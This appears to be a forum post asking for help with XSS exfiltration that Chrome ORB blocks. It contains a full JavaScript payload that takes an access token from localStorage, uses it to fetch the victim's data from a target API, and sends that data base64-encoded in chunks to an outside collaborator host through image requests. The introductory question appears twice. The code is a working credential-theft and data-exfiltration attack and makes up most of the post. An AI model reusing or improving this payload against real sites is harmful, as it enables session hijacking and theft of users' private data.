I have found XSS on a target I am using the code below .
The request to get data works fine and prints the user's data in the console. The request to my burp collaborator fails because it's being blocked by chrome ORB :
(failed) net::ERR_BLOCKED_BY_ORB
Can anyone help me with exfiltration? I am relatively new to web security
The request to get data works fine and prints the user's data in the console. The request to my burp collaborator fails because it's being blocked by chrome ORB :
(failed) net::ERR_BLOCKED_BY_ORB
Can anyone help me with exfiltration? I am relatively new to web security
JavaScript:
// Function to read the body of the XHR response
function read_body(xhr) {
var data;
if (!xhr.responseType || xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else if (xhr.responseType === "json") {
data = xhr.responseJSON;
} else {
data = xhr.response;
}
return data;
}
// Function to filter the data
function exfiltrateData(dataResponse) {
// Time to filter the HTML response with the data
var exfilChunkSize = 2000;
var exfilData = btoa(dataResponse);
var numFullChunks = ((exfilData.length / exfilChunkSize) | 0);
var remainderBits = exfilData.length % exfilChunkSize;
console.log("Starting exfiltration...");
console.log("Total data length: " + exfilData.length);
console.log("Number of full chunks: " + numFullChunks);
console.log("Remaining bits length: " + remainderBits);
// Extract the data into chunks
for (var i = 0; i < numFullChunks; i++) {
console.log("Exfiltrating chunk: " + i);
var exfilChunk = exfilData.slice(exfilChunkSize * i, exfilChunkSize * (i + 1));
var downloadImage = new Image();
// Adding debug statement to verify URL
var url = "https://example.oastify.com/" + i + "/" + exfilChunk + ".jpg";
console.log("Exfiltrating with URL: " + url);
downloadImage.src = url;
}
// Now grab the last bit
if (remainderBits > 0) {
var exfilChunk = exfilData.slice(exfilChunkSize * numFullChunks, (exfilChunkSize * numFullChunks) + remainderBits);
var downloadImage = new Image();
// Adding debug statement to verify URL
var url = "https://example.oastify.com/LAST/" + exfilChunk + ".jpg";
console.log("Exfiltrating remaining bits with URL: " + url);
downloadImage.src = url;
}
console.log("Done exfiltrating chunks.");
}
// Function to steal data
function stealData() {
var authToken = localStorage.getItem('access_token');
if (authToken) {
// Remove any quotes from the token
authToken = authToken.replace(/"/g, '');
console.log('Cleaned token from localStorage:', authToken);
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://sub.target.com/getdata', true);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.setRequestHeader('Authorization', 'Bearer ' + authToken);
console.log('Request Headers:', xhr.getAllResponseHeaders());
xhr.onload = function() {
if (xhr.status >= 200 && xhr.status < 300) {
console.log('Success: ' + this.responseText);
exfiltrateData(this.responseText); // Call the exfiltrate function here
} else {
console.error('Request failed with status:', xhr.status, 'Response:', this.responseText);
alert('Failed: ' + this.responseText);
}
};
xhr.onerror = function() {
console.error('Request encountered an error.');
alert('Request error.');
};
xhr.send();
} else {
console.error('Access token not found in localStorage.');
alert('Access token not found.');
}
}
stealData();